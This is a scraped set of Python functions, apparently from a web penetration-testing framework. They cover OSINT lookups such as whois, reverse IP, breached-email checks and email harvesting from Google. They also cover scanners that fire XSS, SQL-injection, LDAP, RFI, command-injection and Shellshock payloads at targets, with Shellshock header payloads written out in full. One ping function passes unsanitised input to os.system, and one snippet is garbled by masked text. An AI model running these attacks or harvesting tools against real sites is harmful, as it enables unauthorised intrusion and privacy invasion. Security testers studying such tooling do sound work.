示例#1
0
def getRes0x00():
    requests = session()
    email = input(C + ' [§] Enter the email :> ' + R)
    if '@' in email and '.' in email:
        pass
    else:
        email = input(C + ' [§] Enter a valid email :> ' + R)

    print(GR + ' [*] Setting headers... (behaving as a browser)...')
    time.sleep(0.7)
    headers = {
        'User-Agent':
        'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201',
        'Accept-Language': 'en-US;',
        'Accept-Encoding': 'gzip, deflate',
        'Accept': 'text/html,application/xhtml+xml,application/xml;',
        'Connection': 'close'
    }
    print(P + ' [!] Making the no-verify request...' + C)
    time.sleep(0.5)
    url = "https://whoisology.com/search_ajax/search?action=email&value=" + email + "&page=1&section=admin"
    result = ''
    try:
        result = requests.get(url, headers=headers, verify=False,
                              timeout=10).content
        if result != '':
            regex = re.compile('whoisology\.com\/(.*?)">')
            stuff = regex.findall(result)
            if len(stuff) > 0:
                for line in stuff:
                    if line.strip() != '':
                        if '.' in line:
                            print(O + ' [+] Received Domain :' + C +
                                  color.TR3 + C + G + line + C + color.TR2 + C)
            else:
                print(R + " [-] Empty domain result for email : " + O + email +
                      C)
    except:
        print(R + " [-] Can't reach url...")
        print(R + ' [-] Request timed out!')
示例#2
0
def apachestat(web):
    name = targetname(web)
    requests = session()
    lvl2 = "apachestat"
    module = "ReconANDOSINT"
    lvl1 = "Active Reconnaissance"
    lvl3 = ""
    flag = 0x00
    time.sleep(0.7)
    #print(R+'\n    ===========================')
    #print(R+'     A P A C H E   S T A T U S ')
    #print(R+'    ===========================\n')

    from core.methods.print import posintact
    posintact("apache status")

    print(C + ' [*] Importing fuzz parameters...')
    time.sleep(0.7)
    print(GR + ' [*] Initializing bruteforce...')
    with open('files/fuzz-db/apachestat_paths.lst', 'r') as paths:
        for path in paths:
            path = path.replace('\n', '')
            url = web + path
            print(B + ' [+] Trying : ' + C + url)
            resp = requests.get(url,
                                allow_redirects=False,
                                verify=False,
                                timeout=7)
            if resp.status_code == 200 or resp.status_code == 302:
                print(O + ' [+] Apache Server Status Enabled at :' + C +
                      color.TR3 + C + G + url + C + color.TR2 + C)
                flag = 0x01
                save_data(database, module, lvl1, lvl2, lvl3, name, url)

    if flag == 0x00:
        save_data(database, module, lvl1, lvl2, lvl3, name,
                  "No server status enabled.")
        print(R + ' [-] No server status enabled!')

    print(C + ' [+] Apache server status completed!\n')
示例#3
0
def subnet(web):
    name = targetname(web)
    module = "ReconANDOSINT"
    lvl1 = "Passive Reconnaissance & OSINT"
    lvl3 = ''
    lvl2 = inspect.stack()[0][3]
    requests = session()
    web = web.replace('http://', '')
    web = web.replace('https://', '')
    if "@" in web:
        web = web.split("@")[1]
    time.sleep(0.4)
    #print(R+'\n   ====================================')
    #print(R+'    S U B N E T  E N U M E R A T I O N')
    #print(R+'   ====================================\n')
    from core.methods.print import posintpas
    posintpas("subnet enumeration")
    print(GR + ' [!] Enumerating subnets in network...')
    time.sleep(0.4)
    print(GR + ' [*] Getting subnet class infos...\n')
    domains = [web]
    for dom in domains:
        text = requests.get('http://api.hackertarget.com/subnetcalc/?q=' +
                            dom).text
        #text = requests.get('https://steakovercooked.com/api/ping/?host=' + dom).text
        http = str(text)

        if 'error' not in http:
            result = http.splitlines()
            for r in result:
                print(O + ' ' + r.split('=')[0] + C + color.TR3 + C + G + '=' +
                      r.split('=')[1] + C + color.TR2 + C)
            save_data(database, module, lvl1, lvl2, lvl3, name, http)
        elif 'No results found' in http:
            print(R + ' [-] No results found!')
            save_data(database, module, lvl1, lvl2, lvl3, name,
                      "No results found.")
        else:
            print(R + ' [-] Outbound Query Exception!')
示例#4
0
def outer(web):
    requests = session()
    global final
    final = []
    wew = []
    time.sleep(0.4)
    print(R + '\n    A P I   R E T R I E V E R  ')
    print(R + '   ---<>----<>----<---<>----<>')

    print(GR + color.BOLD + ' [!] Retriving subdomains...')
    time.sleep(0.4)
    print("" + GR + color.BOLD + " [~] Result: " + color.END)
    dom = 'http://' + web
    text = requests.get('http://api.hackertarget.com/hostsearch/?q=' +
                        dom).text
    result = str(text)
    if 'error' not in result:
        print(color.END + result + C)
        mopo = result.splitlines()
        for mo in mopo:
            ro = mo.split(',')[0]
            final.append(str(ro))
示例#5
0
    def xsscookie0x00(web, parallel):

        #print(R+'\n    =======================')
        print(R + '\n     X S S  (Cookie Based)')
        print(R + '    ——·‹›·––·‹›·——·‹›·——·‹›\n')

        sleep(0.5)
        vsession = session()
        vsession.get(web)
        if vsession.cookies:
            print(G + ' [+] This website supports session cookies...')
            success = []
            if not parallel:
                success += cookieatck(pay, vsession, web)
            else:
                paylists = listsplit(pay, round(len(pay) / processes))
                with Pool(processes=processes) as pool:
                    res = [
                        pool.apply_async(cookieatck, args=(
                            l,
                            vsession,
                            web,
                        )) for l in paylists
                    ]
                    for y in res:
                        i = y.get()
                        success += i
            if success:
                print(
                    " [+] XSS (Cookie) Vulnerability found! Successful payloads:"
                )
                for i in success:
                    print(i)
            else:
                print(R + "\n [-] No payload succeeded." + C)
        else:
            print(R + ' [-] No support for cookies...')
            time.sleep(0.5)
            print(R + ' [-] Cookie based injection not possible...')
def shellshock0x00(web):
    requests = session()
    print(GR + ' [*] Parsing strings...')
    time.sleep(0.5)
    r_str = ''.join(Random().sample(string.ascii_letters, 30))
    print(GR + ' [*] Configuring payloads...')
    con = '() { :;}; echo; echo; echo %s' % (r_str)
    cmd = "() { test;};/bin/nopatchobfu"
    headers = {'User-agent': cmd}
    time.sleep(0.5)
    print(O + ' [*] Making no-verify request...')
    time.sleep(1)
    r = requests.get(web, headers=headers, verify=False)
    if r.status_code == 500 or r.status_code == 502:
        print(G + ' [+] The website seems Vulnerable to Shellshock...')
        time.sleep(0.5)
        print(O + ' [*] Confirming the vulnerability...')

        headers = {'User-Agent': con, 'Cookie': con, 'Referer': con}

        resp = requests.get(web, headers=headers, verify=False)
        if resp.status_code == 200:
            if re.search(r_str, resp.content, re.I):
                print(G + ' [+] ShellShock was found in: {}'.format(resp.url))
                data = 'ShellShock was found in: {}'.format(resp.url)
                save_data(database, module, lvl1, lvl2, lvl3, name, data)

        elif r.status_code:
            print(
                R +
                ' [-] 2nd phase of detection does not reveal vulnerability...')
            print(O + ' [!] Please check manually...')
            save_data(
                database, module, lvl1, lvl2, lvl3, name,
                "2nd phase of detection does not reveal vulnerability. Please check manually."
            )
    else:
        print(R + ' [-] The website seems immune to shellshock...')
        save_data(database, module, lvl1, lvl2, lvl3, name, "Not vulnerable.")
示例#7
0
def apircv(web):
    requests = session()
    try:
        domain = web.replace('http://','')
        domain = web.replace('https://','')
        html = requests.get('http://w3techs.com/siteinfo.html?fx=y&url=' + domain).text
        soup = BeautifulSoup(html, 'lxml')
        table = soup.findAll('table', attrs={'class':'w3t_t'})[0]
        trs = table.findAll('tr')

        for tr in trs:
            th = tr.find('th')
            td = tr.find('td').text

            if td[-7:] == 'more...':
                td = td[:-9]

            print(G+' [+] '+th.text+': ')
            print(C+'      '+td+'\n')
            time.sleep(0.7)
    except:
        print(R+' [-] Outbound Query Exception!')
示例#8
0
def getRes0x00():
    requests = session()
    email = input(O+' [#] Enter the email :> '+R)
    if '@' in email and '.' in email:
        pass
    else:
        email = input(O+' [#] Enter a valid email :> '+R)

    print(GR+' [*] Setting headers... (behaving as a browser)...')
    time.sleep(0.7)
    headers =   {'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201',
                 'Accept-Language':'en-US;',
                 'Accept-Encoding': 'gzip, deflate',
                 'Accept': 'text/html,application/xhtml+xml,application/xml;',
                 'Connection':'close'}
    print(O+' [!] Making the no-verify request...')
    time.sleep(0.5)
    url = 'https://hacked-emails.com/api?q='+str(email)

    try:
        req = requests.get(url, headers=headers, timeout=10, verify=False)
        content = req.text
        if content != "":
            content = json.loads(content)
            if content['status'] == "found":
                print("Result found ("+G+str(content['results']) + " results" + Style.RESET_ALL + ")")
                for line in content['data']:
                    try:
                        print(G+" [+] "+O+email+G+" found in : " +C+ str(line['title']) +R+" (" + str(line['date_leaked'])+')')
                    except:
                        print(R+" [-] Can't parse the leak titles via APi...")
            else:
                print(R+' [-] Email '+O+email+R+' not found in any breaches!')
        else:
            print(R+' [-] Error found in Json Request...')

    except Exception:
        print(R+" [-] Can't reach url...")
        print(R+' [-] Request timed out!')
示例#9
0
def request(url, lvl2):
    name = targetname(url)
    requests = session()
    time.sleep(0.5)
    links = [url]
    po = url.split('//')[1]
    for w in links:
        print(GR+' [*] Scraping Page: '+O+url+C)
        req = requests.get(w).text
        check0x00(req, url, lvl2, name)

    soup = BeautifulSoup(req,'lxml')
    for line in soup.find_all('a', href=True):
        newline = line['href']
        try:
            if newline[:4] == "http":
                if po in newline:
                    urls.append(str(newline))
            elif newline[:1] == "/":
                combline = url+newline
                urls.append(str(combline))
        except Exception:
            print(R+' [-] Unhandled Exception Occured!')

    try:
        for uurl in urls:
            print("\n"+O+" [+] Scraping Page: "+C+color.TR3+C+G+uurl+C+color.TR2+C)
            req = requests.get(uurl).text
            check0x00(req, url, lvl2, name)

    except Exception:
        print(R+' [-] Outbound Query Exception...')

    if found == 0x00:
        print(R+'\n [-] No Errors found in Source Code!\n')
        save_data(database, module, lvl1, lvl2, lvl3, name, "No Errors found in Source Code.")

    print(G+' [+] Scraping Done!'+C+color.TR2+C)
示例#10
0
def getemails0x00(domain):
    requests = session()
    global flag
    flag = False
    page_counter = 0
    try:
        while page_counter < 100 :
            print(GR+' [*] Setting parameters...')
            time.sleep(0.6)
            results = 'http://www.google.com/search?q='+str(domain)+'&hl=en&lr=&ie=UTF-8&start=' + repr(page_counter) + '&sa=N'
            print(O+' [!] Making the request...')
            response = requests.get(results)
            print(GR+' [*] Extracting reponse...')
            text = response.text
            emails = re.findall('([\w\.\-]+@'+domain+')',tagparse(text))
            for email in emails:
                print(G+' [+] Received e-mail : '+O+email)
                flag = True
            page_counter = page_counter + 10
    except IOError:
        print(R+" [-] Error connecting to Google Groups...")

    try:
        while page_counter < 100 :
            print(GR+' [*] Setting parameters...')
            time.sleep(0.6)
            results = 'http://groups.google.com/groups?q='+str(domain)+'&hl=en&lr=&ie=UTF-8&start=' + repr(page_counter) + '&sa=N'
            print(O+' [!] Making the request...')
            response = requests.get(results)
            print(GR+' [*] Extracting reponse...')
            text = response.text
            emails = re.findall('([\w\.\-]+@'+domain+')',tagparse(text))
            for email in emails:
                print(G+' [+] Received e-mail : '+O+email)
                flag = True
            page_counter = page_counter + 10
    except IOError:
        print(R+" [-] Error connecting to Google Groups...")
示例#11
0
def sessionfix(url):
    requests = session()
    #print(R+'\n   =================================')
    #print(R+'\n    S E S S I O N   F I X A T I O N')
    #print(R+'   ——·‹›·––·‹›·——·‹›·——·‹›·––·‹›·——·\n')

    from core.methods.print import pvln
    pvln("session fixation") 
                
    print(GR+' [*] Making the request...')
    if properties["COOKIE"][1] == " ":
        coo = input(O+' [§] Got any cookies? [Just Enter if None] :> ')
    elif properties["COOKIE"][1].lower() == "none":
        coo = ""
    else:
        coo = properties["COOKIE"][1]
    if coo is not "":
        req = requests.get(url, cookies=coo, verify=True, timeout=7)
    else:
        req = requests.get(url, verify=True, timeout=7)
    if req.cookies:
        print(G+' [+] Found cookie reflecting in headers...')
        print(B+' [+] Initial cookie state: '+C, req.cookies, '\n')
        user = input(O+' [§] Enter authentication username :> '+C)
        upass = input(O+' [§] Enter password :> '+C)
        print(GR+' [*] Trying POST request with authentication...')
        cookie_req = requests.post(url, cookies=req.cookies, auth=(user, upass), timeout=7)
        print(B+' [+] Authenticated cookie state:'+C, cookie_req.cookies)
        if req.cookies == cookie_req.cookies:
            print(G+' [+] Site seems to be vulnerable...')
            print(G+' [+] Site is vulnerable to session fixation vulnerability!')
        else:
            print(O+' [!] Cookie values do not match...')
            print(R+' [-] Target not vulnerable to session fixation!')
    else:
        print(R+' [-] No basic cookie support!')
        print(R+' [-] Target not vulnerable to session fixation!')
    print(G+' [+] Session Fixation Module Completed!\n')
示例#12
0
def revdns(web):
    name = targetname(web)
    module = "ReconANDOSINT"
    lvl1 = "Passive Reconnaissance & OSINT"
    lvl3 = ''
    lvl2 = inspect.stack()[0][3]
    requests = session()
    web = web.split('//')[1]
    if "@" in web:
        web = web.split("@")[1]
    #print(R+'\n   =====================================')
    #print(R+'    R E V E R S E   D N S   L O O K U P')
    #print(R+'   =====================================\n')
    from core.methods.print import posintpas
    posintpas("reverse dns lookup")
    time.sleep(0.4)
    print('' + GR + color.BOLD + ' [!] Looking Up for Reverse DNS Info...')
    time.sleep(0.4)
    print("" + GR + color.BOLD + " [~] Result: \n" + color.END)
    text = requests.get('http://api.hackertarget.com/reversedns/?q=' + web)
    result = text.text
    if 'error' not in result and 'no result' not in result.lower():
        res = result.splitlines()
        for r in res:
            print(r)
            print(O + ' [+] Received :' + C + color.TR3 + C + G +
                  r.split(',')[0].strip() + ' => ' + C + '(' +
                  r.split(',')[1].strip() + ')' + C + color.TR2 + C)
            time.sleep(0.04)
            links.append(r)

        data = result
        save_data(database, module, lvl1, lvl2, lvl3, name, data)

    else:
        print(R + ' [-] No result found!')
        save_data(database, module, lvl1, lvl2, lvl3, name, "No result found.")
        time.sleep(0.8)
示例#13
0
def check0x00(url, pays, check):

    #vuln = 0
    success = []
    requests = session()
    for params in url.split("?")[1].split("&"):
        for payload in pays:
            vuln = False
            print(B+'\n [*] Trying payload :> '+C+str(payload))
            print(GR+' [!] Setting parameter value...')
            bugs = url.replace(params, params + str(payload).strip())
            print(O+' [*] Making the request...')
            #request = useragent.open(bugs)
            request = requests.get(bugs)
            print(GR+' [*] Reading response...')
            html = request.content
            checker = re.findall(check, str(html))
            if (len(checker) != 0):
                vuln = True
            else:
                vuln = False

            if vuln == True:
                print(G+" [+] Possible vulnerability found!")
                print(C+" [+] Payload: ", payload)
                print(R+" [+] Example PoC: " + bugs)
                #vuln = vuln + 1
                success.append(bugs)
            else:
                print(R+' [-] No command injection flaw detected!')
                print(O+' [-] Payload '+R+payload+O+' not working!')


    #if (vuln == 0):
    #    print(G+"\n [+] This website is damn secure. No vulnerabilities found. :)\n")
    #else:
    #    print("\n [+] "+str(vuln)+" Bugs Found. Happy Hunting... :) \n")
    return success
示例#14
0
def userpre(pay, web):
    success = []
    requests = session()
    for i in pay:
        print(B + ' [*] Using payload : ' + C + i)
        time.sleep(0.7)
        user_agent = {
            'User-agent':
            'Mozilla/5.0 (X11; Ubuntu; Linux' +
            'x86_64; rv:39.0) Gecko/20100101 Firefox/39.0'
        }
        user_agent['User-agent'] += i
        req = requests.get(web, headers=user_agent)
        print(O + ' [*] Using ' + R + '!nfected' + O + ' UA : ' + GR +
              user_agent['User-agent'])
        #flag = u' '.join(req.text).encode('utf-8').strip()
        flag = " ".join(req.text).strip()
        if 'error' in flag or 'syntax' in flag or 'MySQL'.lower(
        ) in flag.lower():
            print(G + '\n [!] Error based SQLi (User-Agent Based) Detected!')
            print(R + ' [!] User-Agent : ' + O + user_agent['User-agent'])
            success.append(i)
    return success
示例#15
0
def refatck(pays, web):
    success = []
    requests = session()
    for j in pays:
        i = '%s' % j
        print(B+' [*] Using payload : '+C+i)
        time.sleep(0.7)
        user_agent = {'Referer': 'http://' + 'xssing.pwn'}
        user_agent['Referer'] += i
        req = requests.get(web, headers=user_agent)
        print(O+' [*] Using '+R+'!nfected'+O+' UA : '+GR+user_agent['Referer'])
        #flag = ' '.join(k for k in req.text).encode('utf-8').strip()
        flag = req.text.encode("utf-8").strip()     
        if str(i) in str(flag):
            #print("1")
            print(G+'\n [!] Cross Site Scripting (Referrer Based) Detected!')
            #print("2")
            print(R+' [!] User-Agent : '+O+user_agent['Referer'])
            print(W+color.BOLD+' [+] Code: '+W)
            #print("3")
            print(str(req.content)+'\n')
            success.append(i)
    return success
示例#16
0
def blocklistssh(web, ip):
    requests = session()
    print(O + '\n [!] Checking on ' + G + 'BlockLists SSH threatlist...')
    try:
        flag = False
        print(GR + ' [*] Making the request...')
        resp = requests.get('https://lists.blocklist.de/lists/ssh.txt',
                            verify=False,
                            timeout=10).text
        print(C + ' [!] Parsing raw data...')
        time.sleep(0.5)
        for i in resp.splitlines():
            if ip in i:
                flag = True
        if flag == True:
            print(R + ' [+] ' + O + web + G +
                  ' has been reported for attacks on SSH services...')
        else:
            print(G + ' [+] ' + O + web + G + ' is clean as per BlockLists...')

    except:
        print(R + ' [-] Request to BlockLists timed out!')
        pass
示例#17
0
def usom(web, ip):
    requests = session()
    print(O + '\n [!] Checking on ' + G + 'Usom threatlist...')
    try:
        print(GR + ' [*] Making a reverse DNS query...')
        print(G + ' [+] DNS : ' + O + ip)
        flag = False
        print(GR + ' [*] Making the request...')
        resp = requests.get('https://www.usom.gov.tr/url-list.txt',
                            verify=False,
                            timeout=10).content
        for i in str(resp).splitlines():
            if ip in i:
                flag = True
        if flag == True:
            print(R + ' [+] ' + O + web + G +
                  ' is harmful and has been reported on Usom...')
        else:
            print(G + ' [+] ' + O + web + G + ' is clean as per Usom...')

    except:
        print(R + ' [-] Request to usom.gov.tr timed out!')
        pass
示例#18
0
def piwebenum(web):
    requests = session()
    time.sleep(0.4)
    web = web.split('//')[1]
    #print(R+'\n   =============================================')
    #print(R+'    P I N G / N P I N G   E N U M E R A T I O N')
    #print(R+'   =============================================\n')
    from core.methods.print import posintact
    posintact("(n)ping enumeration")
    print(GR + ' [!] Pinging website...')
    time.sleep(0.5)
    print(O + ' [*] Using adaptative ping and debug mode with count 5...')
    time.sleep(0.4)
    print(GR + ' [!] Press Ctrl+C to stop\n' + C)
    os.system('ping -D -c 5 ' + web)
    print('')
    time.sleep(0.6)
    print(O + ' [*] Trying NPing (NMap Ping)...')
    print(C + " [~] Result: \n")
    print('')
    text = requests.get('http://api.hackertarget.com/nping/?q=' + web).text
    nping = str(text)
    print(G + nping + '\n')
示例#19
0
def credit0x00(url):
    requests = session()
    print(G+' [+] Importing credit card signatures...')
    time.sleep(0.5)
    links = [url]
    po = url.split('//')[1]
    for w in links:
        print(GR+' [*] Scraping Page: '+O+url)
        req = requests.get(w).text
        check0x00(req)

    soup = BeautifulSoup(req,'lxml')
    for line in soup.find_all('a', href=True):
        newline = line['href']
        try:
            if newline[:4] == "http":
                if po in newline:
                    urls.append(str(newline))
            elif newline[:1] == "/":
                combline = url+newline
                urls.append(str(combline))
        except:
            print(R+' [-] Unhandled Exception Occured!')

    try:
        for uurl in urls:
            print(G+"\n [+] Scraping Page: "+O+uurl)
            req = requests.get(uurl).text
            check0x00(req)

    except:
        print(R+' [-] Outbound Query Exception...')

    if found == 0x00:
        print(R+' [-] No Credit Cards found disclosed in plaintext in source code!')

    print(G+' [+] Scraping Done!')
示例#20
0
def getgeoip(web):
    name = targetname(web)
    requests = session()
    web = web.replace('http://', '')
    web = web.replace('https://', '')
    if "@" in web:
        web = web.split("@")[1]
    #print(R+'\n   =========================')
    #print(R+'    G E O I P   L O O K U P')
    #print(R+'   =========================\n')
    from core.methods.print import posintpas
    posintpas("geoip lookup")
    time.sleep(0.4)
    print(GR + ' [!] Looking Up for WhoIS Information...')
    time.sleep(0.4)
    print(GR + " [~] Found GeoIp Location: \n")
    domains = socket.gethostbyname(web)
    time.sleep(0.6)
    text = requests.get('http://api.hackertarget.com/geoip/?q=' + domains).text
    result = str(text)
    if 'error' not in result and 'invalid' not in result:
        res = result.splitlines()
        for r in res:
            print(O + ' [+] ' + r.split(':')[0].strip() + '' + C + color.TR3 +
                  C + G + r.split(':')[1].strip() + C + color.TR2 + C)
            time.sleep(0.1)

    else:
        print(R + ' [-] Outbound Query Exception!')
        time.sleep(0.8)

    module = "ReconANDOSINT"
    lvl1 = "Passive Reconnaissance & OSINT"
    lvl2 = inspect.stack()[0][3]
    lvl3 = ""
    data = result
    save_data(database, module, lvl1, lvl2, lvl3, name, data)
示例#21
0
def revip(web):
    name = targetname(web)
    module = "ReconANDOSINT"
    lvl1 = "Passive Reconnaissance & OSINT"
    lvl3 = ''
    lvl2 = inspect.stack()[0][3]
    requests = session()
    web = web.replace('http://', '')
    web = web.replace('https://', '')
    if "@" in web:
        web = web.split("@")[1]
    #print(R+'\n   ===================================')
    #print(R+'    R E V E R S E   I P   L O O K U P')
    #print(R+'   ===================================\n')
    from core.methods.print import posintpas
    posintpas("reverse ip lookup")
    time.sleep(0.4)
    print('' + GR + color.BOLD + ' [!] Looking Up for Reverse IP Info...')
    time.sleep(0.4)
    print("" + GR + color.BOLD + " [~] Result : \n" + color.END)
    domains = [web]
    for dom in domains:
        text = requests.get('http://api.hackertarget.com/reverseiplookup/?q=' +
                            dom).text
        result = str(text)
        res = result.splitlines()
        if 'error' not in result:
            for r in res:
                print(O + ' [+] Site :>' + C + color.TR3 + C + G + r + C +
                      color.TR2 + C)
                links.append(r)
                time.sleep(0.04)
            save_data(database, module, lvl1, lvl2, lvl3, name, result)

        elif 'error' in result:
            print(R + ' [-] Outbound Query Exception!')
            time.sleep(0.8)
示例#22
0
def check0x00(alias, web):
    requests = session()
    print(GR + " [*] Searching alias " + O + alias + GR +
          " on 160 websites...\n")
    print(GR + ' [¬] Result : \n')
    headers = {'X-Requested-With': 'XMLHttpRequest'}

    for service in services:
        try:
            url = 'http://checkusernames.com/usercheckv2.php?target=' + service + '&username='******'notavailable' in req.text:
                #if req.content.split('|')[0] == '2': #found
                print(GR + ' [+] Found ' + O + alias + G + ' : ' + C + service)
                serv.append(service)

        except Exception as e:
            print(R + ' [-] Incurred Exception : ' + str(e))

    if 'http://' in web.strip():
        po = web.replace('http://', '')
    elif 'https://' in web.strip():
        po = web.replace('https://', '')
    if "@" in po:
        po = po.split("@")[1]
    p = 'tmp/logs/' + po + '-logs/' + str(po) + '-usernames.lst'
    open(p, 'w+')
    print(B + ' [!] Saving links...')
    time.sleep(1)
    for m in serv:
        m = 'Social Network : ' + m + '\n'
        ile = open(p, "a")
        ile.write(m)
        ile.close()
    pa = os.getcwd()
    print(G + ' [+] Links saved under ' + pa + '/' + p + '!')
    print('')
示例#23
0
def check0x00(web000, headers, pays):
    success = []
    requests = session()
    for payload in pays:
        gotcha = False
        print(B + '\n [+] Using Payload : ' + C + payload)
        web0x00 = web000 + payload
        print(O + ' [+] Url : ' + C + web0x00)
        print(GR + ' [*] Making the request...')
        try:
            req = requests.get(web0x00,
                               headers=headers,
                               allow_redirects=False,
                               timeout=7,
                               verify=False).text
            print(O + ' [!] Searching through error database...')
            for err in ldap_errors:
                if err.lower() in req.lower():
                    print(G + ' [+] Possible LDAP Injection Found : ' + O +
                          web0x00)
                    gotcha = True
                    print(O + ' [+] Response : ')
                    print(P + req)
                    success.append(payload)
                else:
                    pass

            if gotcha == False:
                print(R + ' [-] No error reflection found in response!')
                time.sleep(0.4)
                print(R + ' [-] Payload ' + O + payload + R + ' not working!')
                pass

        except Exception as e:
            print(R + ' [-] Query Exception : ' + str(e))
    return success
示例#24
0
def iphistory(web):
    requests = session()
    try:
        #print(R+'\n    =====================')
        #print(R+'     I P   H I S T O R Y')
        #print(R+'    =====================\n')
        from core.methods.print import posintpas
        posintpas("ip history")
        print(GR+' [*] Parsing Url...')
        web0 = web.split('//')[-1]
        if "@" in web0:
            web0 = web0.split("@")[1]

        print(web0)

        print(O+' [!] Making the request...')
        html = requests.get('http://viewdns.info/iphistory/?domain=' + web0).text
        print(GR+' [*] Parsing raw-data...')
        time.sleep(0.7)
        soup = BeautifulSoup(html,'lxml')
        print(O+' [!] Setting parameters...')
        table = soup.findAll('table', attrs={'border':'1'})[0]
        print(C+' [!] Finding IP history instances...')
        trs = table.findAll('tr')
        trs.pop(0)

        print(G+'\n [+] Following instances were found...')

        for tr in trs:
            td = tr.findAll('td')
            info = {'ip' : td[0].text, 'owner' : td[2].text.rstrip(), 'last' : td[3].text}
            print(G+' [+] Instance : ' +C+ info['ip'] +GR+ ' => ' + info['owner'] +B+ ' - (' + info['last'] + ')')
            time.sleep(0.02)

    except:
        print(R+' [-] No instances of IP History found...')
示例#25
0
def projecthoneypot(web, ip):
    requests = session()
    print(O + '\n [!] Checking on ' + G + 'Project HoneyPot threatlist...')
    try:
        flag = False
        print(GR + ' [*] Making the request...')
        resp = requests.get('https://www.projecthoneypot.org/list_of_ips.php',
                            verify=False,
                            timeout=10).text
        if str(ip) in resp:
            flag = True

        if flag == True:
            print(
                R + ' [+] ' + O + web + G +
                ' is a harmful site and has been reported on Project HoneyPot...'
            )
        else:
            print(G + ' [+] ' + O + web + G +
                  ' is clean as per Project HoneyPot...')

    except:
        print(R + ' [-] Request to projecthoneypot.com timed out!')
        pass
示例#26
0
def check0x00(web, dirpath, headers):
    requests = session()
    try:
        for dirs in dirpath:
            web0x00 = web + dirs
            req = requests.get(web0x00,
                               headers=headers,
                               allow_redirects=False,
                               timeout=7,
                               verify=False)
            try:
                if (req.headers['content-length'] is not None):
                    size = int(req.headers['content-length'])
                else:
                    size = 0

            except (KeyError, ValueError, TypeError):
                size = len(req.content)
            finally:
                size = FileUtils.sizeHuman(size)

            resp = str(req.status_code)
            if (resp == '200' or resp == '302' or resp == '304'):
                print(G + ' [*] Found : ' + O + web0x00 + GR + ' - ' + size +
                      G + ' (' + resp + ')')
                file_paths.append(web0x00)

            else:
                print(C + ' [*] Checking : ' + B + web0x00 + R + ' (' + resp +
                      ')')
        return file_paths

    except Exception as e:
        print(R + ' [-] Unknown Exception Encountered!')
        print(R + ' [-] Exception : ' + str(e))
        return file_paths
示例#27
0
def brute0x00(web):
    requests = session()
    try:
        print(GR+' [*] Importing wordlist...')
        if os.path.exists('files/fuzz-db/rfi_paths.lst') == True:
            print(G+' [+] File path found!')
            time.sleep(0.6)
            print(O+' [*] Importing wordlist...')
            with open('files/fuzz-db/rfi_paths.lst','r') as wew:
                for w in wew:
                    w = w.strip('\n')
                    payloads.append(w)
            print(GR+' [*] Starting bruteforce...')
            time.sleep(0.7)
            for pay in payloads:
                try:
                    pay = pay.replace('XXpathXX',payload_url)
                    web0x00 = web + pay
                    req = requests.get(web0x00, allow_redirects=False, timeout=7, verify = False)
                    c = str(req.status_code)
                    if c == '200' and payload_1 in req.text and payload_2 in req.text and payload_3 in req.text:
                        print(G+' [+] Possible RFi at : '+O+web0x00+G+' (200)')
                    elif c == '404':
                        print(B+' [*] Checking dir : '+C+web0x00+R+' (404)')
                    elif c == '302':
                        print(B+' [*] Possible RFi : '+C+web0x00+GR+' (302)')
                    else:
                        print(O+' [*] Interesting response : '+GR+web0x00+O+' ('+c+')')

                except:
                    print(R+' [-] Exception Encountered!')
                    pass

    except Exception as e:
        print(R+' [-] Unexpected Exception Encountered!')
        print(R+' [-] Exception : '+str(e))
示例#28
0
    def sqliuser0x00(web, parallel):

        #print(R+'\n    =============================')
        print(R+'\n     S Q L i  (User-Agent Based)')
        print(R+'    ––·‹›·––·‹›·––·‹›·––·‹›·––·‹›\n')
        success = []
        requests = session()
        if not parallel:
            for i in pay:
                print(B+' [*] Using payload : '+C+i)
                time.sleep(0.7)
                user_agent = {'User-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux' +
                            'x86_64; rv:39.0) Gecko/20100101 Firefox/39.0'}
                user_agent['User-agent'] += i
                req = requests.get(web, headers=user_agent)
                print(O+' [*] Using '+R+'!nfected'+O+' UA : '+GR+user_agent['User-agent'])
                #flag = u' '.join(req.text).encode('utf-8').strip()
                flag = " ".join(req.text).strip()
                if 'error' in flag or 'syntax' in flag or 'MySQL'.lower() in flag.lower():
                    print(G+'\n [!] Error based SQLi (User-Agent Based) Detected!')
                    print(R+' [!] User-Agent : '+O+user_agent['User-agent'])
                    success.append(i)
        else:
            paylists = listsplit(pay, round(len(pay)/processes)) 
            with Pool(processes=processes) as pool:
                res = [pool.apply_async(userpre, args=(l,web,)) for l in paylists]
                #res1 = pool.apply_async(portloop, )
                for i in res:
                    j = i.get()
                    success += j
        if success:
            print(" [+] SQLi Vulnerability found! Successful payloads:")
            for i in success:
                print(i)
        else:
            print(R + "\n [-] No payload succeeded."+C)
示例#29
0
 def do_fetch(self, inp, gui=False):
     try:
         localver = varis.e_version.split("#")[0]
         s = session()
         onver = s.get("https://raw.githubusercontent.com/VainlyStrain/Vaile/master/core/doc/version").text.strip()
         localmain = localver.split("-")[0]
         localrev = localver.split("-")[1]
         locallist = localmain.split(".")
         onmain = onver.split("-")[0]
         onrev = onver.split("-")[1]
         onlist = onmain.split(".")
         uptodate = True
         for i in range(0, len(locallist)):
             if int(locallist[i]) < int(onlist[i]):
                 uptodate = False
         if uptodate:
             if int(localrev) < int(onrev):
                 uptodate = False
         if not uptodate:
             print(" [!] An update is available! Last version is: {}, installed version is: {}.".format(onver, localver))
             if not gui:
                 d = input(" [?] Do you want to update the framework? (enter if not) :> ")
                 if d is not "":
                     path = os.path.dirname(os.path.realpath(__file__))
                     if "/home/" in path:
                         user = path.split("/")[2]
                         os.system("sudo -u {} git pull".format(user))
                     else:
                         os.system("git pull ; cp tmp/Vaile /bin/Vaile ; chmod +x /bin/Vaile")
                     print(G+" [+] Update installed successfully."+C+color.TR2+C)
         else:
             print(" [+] You are running the latest version of Vaile-framework ({}).".format(localver))
         if gui:
             return (uptodate, onver)
     except:
         print(R + " [-] " + "\033[0m" + color.UNDERLINE + "\033[1m" + "An error occurred fetching...")
示例#30
0
def whoischeckup(web):
    requests = session()
    web = web.replace('http://', '')
    web = web.replace('https://', '')
    if "@" in web:
        web = web.split("@")[1]
    #print(R+'\n   =========================')
    #print(R+'    W H O I S   L O O K U P')
    #print(R+'   =========================\n')
    from core.methods.print import posintpas
    posintpas("whois lookup")
    time.sleep(0.4)
    print('' + GR + color.BOLD + ' [!] Looking Up for WhoIS Information...')
    time.sleep(0.4)
    print("" + GR + color.BOLD + " [~] Result: \n" + color.END)
    domains = [web]
    for dom in domains:
